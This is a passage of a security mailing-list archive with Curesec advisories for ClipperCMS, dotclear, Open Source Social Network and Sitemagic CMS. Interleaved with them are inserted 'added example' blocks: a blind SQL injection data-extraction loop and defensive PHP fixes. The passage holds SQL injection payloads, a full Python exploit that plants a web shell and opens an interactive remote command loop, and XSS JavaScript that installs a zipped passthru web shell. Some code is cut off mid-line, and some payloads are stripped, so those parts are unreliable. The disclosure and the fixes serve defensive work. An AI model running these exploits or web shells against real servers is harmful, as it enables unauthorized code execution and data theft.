Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.

An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.

3. SQL Injection 1 (Blind)

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The id parameter of the web user editor is vulnerable to blind SQL Injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept


http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND 
IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 
seconds')),null) %23
-> true

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND 
IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(5000,ENCODE('MSG','by 5 
seconds')),null) %23
-> false

Code


/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where 
webuser=".$_GET['id']."";
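The blind probes above, and the PayPal one in the AlegroCart advisory earlier in this thread, each answer one yes/no question per request. As an added example (not ClipperCMS or AlegroCart code), the loop below turns such an oracle into recovered data; the oracle is simulated with SQLite and the table contents are constructed. For a time-based oracle like the BENCHMARK() payloads, the oracle function would issue the HTTP request and return whether it took longer than a threshold; the extraction loop stays the same.

```python
import sqlite3
from typing import Callable

Oracle = Callable[[str], bool]

def make_oracle() -> Oracle:
    """Simulated target for the ClipperCMS query above:
         SELECT * FROM web_groups WHERE webuser=<id>
    with <id> attacker-controlled. The oracle answers True when the page
    shows a result row. Table contents are constructed for the example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE web_groups(webuser INTEGER, webgroup INTEGER);
        INSERT INTO web_groups VALUES (1, 1);
        CREATE TABLE manager_users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO manager_users VALUES (1, 'admin', 'constructed-hash');
    """)

    def oracle(injected_id: str) -> bool:
        sql = "SELECT * FROM web_groups WHERE webuser=" + injected_id
        return conn.execute(sql).fetchone() is not None
    return oracle

def extract(oracle: Oracle, expr: str, max_len: int = 64) -> str:
    """Recover the string value of the SQL expression `expr`, one character
    at a time, binary-searching each ASCII code point with 7 yes/no probes.
    SQLite spelling: unicode(substr(x,i,1)); on MySQL use ORD(SUBSTRING(x,i,1))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Same shape as the advisory's "id=1 AND IF(...)" probe.
            probe = "1 AND unicode(substr((%s),%d,1)) > %d" % (expr, pos, mid)
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # Past the end of the string: substr() is '' and the comparison
            # is NULL, so every probe came back False.
            break
        out += chr(lo)
    return out
```

Cost is 7 requests per character plus a final round that detects the end of the string; with the 5-second BENCHMARK() delay from the proof of concept that is what makes the approach slow rather than impossible.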

4. SQL Injection 2

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the newusername parameter is vulnerable to SQL injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept


POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM 
mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Code


/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";

5. SQL Injection 3

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.

To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameters are analogous to this POC for
gender:


POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Visiting the overview page of that user will show the result of the injected
query.

Code


/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$ge
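A parameterized form of that UPDATE, added here as an example and not taken from ClipperCMS: it assumes a PDO connection in $pdo, a table name obtained from the framework's getFullTableName() helper, and the column list visible in the vulnerable query; the function name and the integer-column list are illustrative.

```php
<?php
// Added example: the same UPDATE with bound parameters instead of string
// interpolation. Assumes a PDO handle $pdo and a table name from the
// framework's getFullTableName(); the column list follows the advisory.
function updateUserAttributes(PDO $pdo, string $table, int $id, array $in): int
{
    // Columns the request may set. Anything not listed is ignored, so a
    // request cannot smuggle in extra columns such as "fax=(SELECT ...)".
    $columns = [
        'fullname', 'role', 'email', 'phone', 'mobilephone', 'fax', 'zip',
        'state', 'country', 'gender', 'dob', 'comment', 'blocked',
        'blockeduntil', 'blockedafter', 'failedlogincount',
    ];
    // Fields that must be integers (assumed types): validated before SQL.
    $intColumns = ['role', 'gender', 'blocked', 'failedlogincount'];

    $set = [];
    $params = [':id' => $id];
    foreach ($columns as $col) {
        if (!array_key_exists($col, $in)) {
            continue;
        }
        $value = $in[$col];
        if (in_array($col, $intColumns, true)) {
            // The advisory's payload "2', fax=(SELECT ...), dob='0" fails
            // this check, so the request is rejected before any SQL runs.
            if (filter_var($value, FILTER_VALIDATE_INT) === false) {
                throw new InvalidArgumentException("$col must be an integer");
            }
            $value = (int) $value;
        }
        // Column names come from our own allow-list above, never from the
        // request, so interpolating them is safe. Values are always bound.
        $set[] = "`$col` = :$col";
        $params[":$col"] = $value;
    }
    if ($set === []) {
        return 0;
    }

    // Identifiers cannot be bound, so re-check the table name even though
    // it is expected to come from getFullTableName().
    if (!preg_match('/^[A-Za-z0-9_`.]+$/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $sql = "UPDATE $table SET " . implode(', ', $set) . " WHERE id = :id";
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}
```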

[FD] ClipperCMS 1.3.0: CSRF

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    ClipperCMS 1.3.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.clippercms.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The only protection against CSRF is a referer check. This check can be disabled
by a user with the rights to edit settings, thus making the application
vulnerable to CSRF.

A user may choose to disable referer checks because, when they are enabled,
external links or direct entry/bookmarks to specific pages in the backend do
not work, which severely limits the usability of the application.
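Synchronizer-token CSRF protection as an alternative to a Referer-only check, added here as an example and not ClipperCMS code. It assumes PHP sessions are in use; the function and field names are illustrative. Because the token is only demanded on state-changing POST requests, bookmarks and external links to backend pages keep working, which removes the reason a user had to disable the check.

```php
<?php
// Added example: per-session CSRF token, verified on every state-changing
// request. Not ClipperCMS code; names are illustrative.
const CSRF_SESSION_KEY = 'csrf_token';

function csrfToken(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        // 32 bytes from the CSPRNG, hex-encoded: unguessable and per session.
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Emit this inside every form that changes state.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Call at the top of every processor that changes state (save, delete, ...).
// Plain GET views are untouched, so bookmarks and external links still work.
function requireValidCsrfToken(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('state changes must use POST');
    }
    $submitted = $_POST['csrf_token'] ?? '';
    // is_string first: "csrf_token[]=x" would otherwise reach hash_equals as
    // an array. hash_equals keeps the comparison constant-time.
    if (!is_string($submitted) || !hash_equals(csrfToken(), $submitted)) {
        http_response_code(403);
        exit('invalid or missing CSRF token');
    }
}
```

The Referer check can stay as defense in depth; it is no longer the only barrier.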

3. Solution

This issue has not been fixed by the vendor.

4. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-CSRF-97.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] ClipperCMS 1.3.0: Code Execution Exploit

2015-11-14 Thread Curesec Research Team (CRT)

#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin,
# Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH c...@curesec.com

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"

def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})

def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)

def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})

def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)

fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)

uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")

uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=")

if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")

runShell(url + "404.png?x=")


#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html



[FD] ClipperCMS 1.3.0: Code Execution

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    ClipperCMS 1.3.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.clippercms.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The file upload uses a whitelist to only allow non-dangerous file extensions.
However, it does allow the upload of .htaccess files, which means that an
attacker can upload files with any extension and still gain code execution.

An account is required to upload files. The role the account is in needs the
right to upload files. By default, the lowest user role - Editor - has this
right.

3. Proof of Concept


The file upload can be found here:
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31

To gain code execution, upload a .htaccess file with the content:
AddType application/x-httpd-php .png

Now, any uploaded file containing PHP code with the extension .png will be 
executed.
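An upload-name policy that closes the gap described above, added here as an example and not ClipperCMS code. The class name and the allow-list passed to it are illustrative; the point is that an extension allow-list alone is not enough while the web server honours per-directory configuration files, so dotfiles are refused outright and every extension segment of a name is checked, not only the last one.

```php
<?php
// Added example (not ClipperCMS code): file-name policy for an upload
// handler. Rejects .htaccess-style dotfiles and multi-extension names in
// addition to enforcing an extension allow-list.
final class UploadNamePolicy
{
    /** @var string[] lower-case extensions the file manager may accept */
    private array $allowed;

    public function __construct(array $allowedExtensions)
    {
        $this->allowed = array_map('strtolower', $allowedExtensions);
    }

    /** Returns null when the name is acceptable, otherwise the reason. */
    public function reject(string $name): ?string
    {
        // Only a bare file name is ever considered: no separators, no NUL.
        if ($name === '' || strpos($name, "\0") !== false
            || strpos($name, '\\') !== false || $name !== basename($name)) {
            return 'path components are not allowed';
        }
        // Dotfiles (.htaccess, .htpasswd, .user.ini, ...) are server config,
        // never user content. Reject every leading-dot name, not a fixed list.
        if ($name[0] === '.') {
            return 'hidden/config files are not allowed';
        }
        if (preg_match('/[\x00-\x1f]/', $name)) {
            return 'control characters are not allowed';
        }
        $parts = explode('.', strtolower($name));
        if (count($parts) < 2) {
            return 'an extension is required';
        }
        // Every extension segment must be allowed, so "404.php.png" is
        // refused even though ".png" is: Apache AddHandler setups also act
        // on inner extensions. Names like "my.photo.png" are refused as a
        // side effect, which is an acceptable trade-off for an upload dir.
        foreach (array_slice($parts, 1) as $ext) {
            if (!in_array($ext, $this->allowed, true)) {
                return "extension .$ext is not allowed";
            }
        }
        return null;
    }
}

// Usage with an illustrative allow-list:
$policy = new UploadNamePolicy(['png', 'jpg', 'jpeg', 'gif', 'pdf']);
foreach (['.htaccess', 'logo.PNG', '404.php.png', '../x.png'] as $candidate) {
    $reason = $policy->reject($candidate);
    echo $candidate, ': ', $reason ?? 'accepted', "\n";
}
```

Even with this policy in place, the upload directory should be served with PHP execution disabled so that a mistake in the allow-list does not become code execution.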

4. Solution

This issue has not been fixed by the vendor.

5. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-95.html



[FD] dotclear 2.8.1: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    dotclear 2.8.1
Fixed in:            2.8.2
Fixed Version Link:  http://download.dotclear.org/latest.zip
Vendor Website:      http://dotclear.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

The Comment author name is echoed inside the value attribute of an input tag
when viewing the list of all comments for that author. Quotes are not encoded,
which allows for the addition of further attributes to the tag.

The field is hidden, so onfocus or similar do not work, and the length of the
name is limited, which makes actual exploitation unlikely. Still, with older
browsers an attacker might try to inject a style attribute, which may lead to
XSS.

3. Proof of Concept


1. Create comment with author name
" newattribute="value
2. Visit

http://localhost/dotclear/admin/comments.php?n=30&status=&sortby=comment_dt&order=desc&author=%22+newattribute%3D%22value
3. The result will be:


4. Solution

To mitigate this issue please upgrade at least to version 2.8.2:

http://download.dotclear.org/latest.zip

Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor
10/25/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/dotclear-281-XSS-94.html



[FD] dotclear 2.8.1: Code Execution

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    dotclear 2.8.1
Fixed in:            2.8.2
Fixed Version Link:  http://download.dotclear.org/latest.zip
Vendor Website:      http://dotclear.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

While the upload of files with the extensions php, php4, and php5 is forbidden,
the upload of files with the extensions pht, phps, and phtml is allowed, which
leads to code execution with most default Apache configurations.

The upload form is located here:
http://localhost/dotclear/admin/media.php?popup=1&plugin_id=dcLegacyEditor

A user with the right "manage their own media items" and "manage their own
entries and comments" is needed to exploit this issue.

3. Code


/dotclear/inc/libs/clearbricks/filemanager
public function uploadFile($tmp,$dest,$overwrite=false)
{
    $dest = $this->pwd.'/'.path::clean($dest);

    if ($this->isFileExclude($dest)) {
        throw new Exception(__('Uploading this file is not allowed.'));
    }
    [...]
    if (@move_uploaded_file($tmp,$dest) === false) {
        throw new Exception(__('An error occurred while writing the file.'));
    }
    [...]
}

[...]
protected function isFileExclude($f)
{
    if (!$this->exclude_pattern) {
        return false;
    }

    return preg_match($this->exclude_pattern,$f);
}

/dotclear/inc/core/class.dc.media.php
$this->exclude_pattern = $core->blog->settings->system->media_exclusion;

/dotclear/inc/core/class.dc.core.php
array('media_exclusion','string','/\.php[0-9]*$/i',
      'File name exclusion pattern in media manager. (PCRE value)'),

Note that after installation, the regex is retrieved from the settings table of 
the database, not from the code.
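The shipped media_exclusion pattern beside a stricter one, run over the same file names so the gap is visible; added here as an example and not dotclear code. The stricter pattern is an assumption about what a safer default looks like, not the pattern dotclear 2.8.2 ships, and because the value lives in the settings table, existing installations need the database value updated as well.

```php
<?php
// Added example, not dotclear code. WEAK_EXCLUSION is the default quoted in
// the advisory; STRICT_EXCLUSION is an assumed, broader pattern.
const WEAK_EXCLUSION   = '/\.php[0-9]*$/i';
// Extensions that common mod_php handler configurations map to PHP (or to
// PHP source display), matched after any dot rather than only at the end so
// that "x.phtml" and "x.php.txt" are both caught (AddHandler-style setups
// act on inner extensions too). Any deny-list is inherently incomplete; an
// allow-list of accepted extensions is the stronger design.
const STRICT_EXCLUSION = '/\.(php[0-9]*|phps|pht|phtml|phar)(\.|$)/i';

// Same shape as the isFileExclude() method quoted above.
function isFileExclude(string $pattern, string $f): bool
{
    if ($pattern === '') {
        return false;
    }
    return preg_match($pattern, $f) === 1;
}

/** Evaluate names against both patterns; returns name => [weak, strict]. */
function compareExclusion(array $names): array
{
    $out = [];
    foreach ($names as $n) {
        $out[$n] = [
            'weak'   => isFileExclude(WEAK_EXCLUSION, $n),
            'strict' => isFileExclude(STRICT_EXCLUSION, $n),
        ];
    }
    return $out;
}

// Constructed sample names: the three extensions the advisory lists, the
// ones the default does catch, and a harmless control.
$samples = ['shell.php', 'shell.php5', 'shell.pht', 'shell.phps', 'shell.phtml',
            'shell.php.txt', 'photo.jpg'];
foreach (compareExclusion($samples) as $name => $r) {
    printf("%-14s default=%-8s strict=%s\n", $name,
        $r['weak'] ? 'blocked' : 'ALLOWED', $r['strict'] ? 'blocked' : 'allowed');
}
```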

4. Solution

To mitigate this issue please upgrade at least to version 2.8.2:

http://download.dotclear.org/latest.zip

Please note that a newer version might already be available.

5. Report Timeline

10/02/2015 Informed Vendor
10/25/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/dotclear-281-Code-Execution-93.html



[FD] Open Source Social Network 3.5: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Open Source Social Network 3.5
Fixed in:            3.6
Fixed Version Link:  https://www.opensource-socialnetwork.org/downloads/ossn-v3.6-1443545762.zip
Vendor Contact:      https://www.opensource-socialnetwork.org/contact
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in Open Source Social Network 3.5.
With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in this case may lead to code execution.

3. XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ossn/search?q='">alert(1)

Code


/ossn/themes/default/plugins/menus/search.php
$menus = $params['menu'];
echo "";
echo '' . ossn_print('result:type') . '';
foreach ($menus as $menu => $val) {
foreach ($val as $link) {
$menu = str_replace(':', '-', $link['text']);
$icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png";
$text = ossn_print($link['text']);
$link = $link['href'];
echo "

{$text}

";
}
}
echo '';

4. XSS 2

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ossn/home?offset=2&foo='">alert(1)

Code


/ossn/themes/default/pagination/view.php
if (count($_GET)) {
$args_url = '';
foreach ($_GET as $key => $value) {
if ($key != 'page') {
$args_url .= '&' . $key . '=' . $value;
}
}
}
[...]
$url = "?offset={$first}{$args_url}";
echo "".ossn_print('ossn:pagination:first')."";
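A way to rebuild the pagination link without echoing raw query-string keys and values into the page, added here as an example and not OSSN code. It assumes the query array comes from $_GET and that the offset is the only value pagination needs to change; function names are illustrative.

```php
<?php
// Added example, not OSSN code: safe reconstruction of the pagination href.
function paginationUrl(array $query, int $offset): string
{
    // Drop "page" as the original loop did, then set the offset explicitly.
    unset($query['page'], $query['offset']);
    $query['offset'] = $offset;
    // http_build_query percent-encodes keys as well as values, so neither a
    // value nor an attacker-chosen key (the "foo" parameter in the proof of
    // concept) can carry quotes or angle brackets into the markup.
    return '?' . http_build_query($query, '', '&', PHP_QUERY_RFC3986);
}

// Escape at the output boundary too: the URL goes into an attribute value,
// and the label into element text, so both are HTML-encoded.
function paginationLink(array $query, int $offset, string $label): string
{
    $href = htmlspecialchars(paginationUrl($query, $offset), ENT_QUOTES, 'UTF-8');
    $text = htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
    return "<a href=\"$href\">$text</a>";
}

// Constructed input mirroring the proof of concept: offset=2&foo='">alert(1)
$get = ['offset' => '2', 'foo' => '\'">alert(1)'];
echo paginationLink($get, 0, 'First'), "\n";
```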

5. XSS to Code Execution

Description

Because the backend allows the upload of PHP files, the XSS vulnerabilities can
lead to code execution.

Proof of Concept


http://localhost/ossn/search?q='">http://localhost/s.js>

/s.js:
var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer';

var html = get(csrfProtectedPage);
document.body.innerHTML = html;
var token = document.getElementsByName("ossn_token")[0].value;
var timestamp = document.getElementsByName("ossn_ts")[0].value;

submitRequest(token, timestamp);

function get(url) {
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", url, false);
    xmlHttp.send(null);
    return xmlHttp.responseText;
}

function submitRequest(token, timestamp) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://localhost/ossn/action/admin/theme_install", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---1441530840601255132539565608");
    xhr.withCredentials = true;
    var body = "-1441530840601255132539565608\r\n" +
        "Content-Disposition: form-data; name=\"ossn_ts\"\r\n" +
        "\r\n" +
        "" + timestamp + "\r\n" +
        "-1441530840601255132539565608\r\n" +
        "Content-Disposition: form-data; name=\"ossn_token\"\r\n" +
        "\r\n" +
        "" + token + "\r\n" +
        "-1441530840601255132539565608\r\n" +
        "Content-Disposition: form-data; name=\"theme_file\"; filename=\"mycustomtheme.zip\"\r\n" +
        "Content-Type: application/x-zip-compressed\r\n" +
        "\r\n" +
"PK\x03\x04\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00mycustomtheme/PK\x03\x04\n"
 +
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00mycustomtheme/404.php\x3c?php
 passthru($_GET[\'x\']);\n" +
"PK\x03\x04\n" +
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x03\x04\n"
 +
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00mycustomtheme/PK\x01\x02?\x03\n"
 +
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x80\xa4\x81,\x00\x00\x00mycustomtheme/404.phpPK\x01\x02?\x03\n" +
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x80\xa4\x81{\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x01\x02?\x03\n" +
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00
 
\x80\xa4\x81\xb5\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x13\x01\x00\x00\xef\x00\x00\x00\x00\x00\r\n"
 

[FD] Sitemagic CMS 4.1: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Sitemagic CMS 4.1
Fixed in:            4.1.1
Fixed Version Link:  http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=SitemagicCMS411.zip
Vendor Contact:      d...@sitemagic.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

If debug is enabled - which it is by default - the values of POST and GET are
echoed unencoded, leading to an XSS vulnerability. With this, it is possible to
inject JavaScript keyloggers, or to bypass CSRF protection, which in this case
may lead to code execution.

3. Proof of Concept


http://localhost/Sitemagic/?dump=true&foo='">alert(1)

4. Code


index.php
if ($debug === true)
{
$end = microtime(true);

if (isset($_REQUEST["dump"]) === true)
{
$time = $end - $start;

echo "Memory usage: " . memory_get_usage(true) / 1024 . " 
KB";
echo "Time usage: " . $time . " seconds";

echo "
POST
" . print_r($_POST, true) . "

GET
" . print_r($_GET, true) . "
";
}
}

5. XSS to Code Execution

Because the file upload in the admin area does not restrict the file type, an
attacker can gain code execution via the XSS vulnerability.


http://localhost/Sitemagic/?dump=true&foo=";>http://localhost/s.js";>

/s.js:
submitRequest();

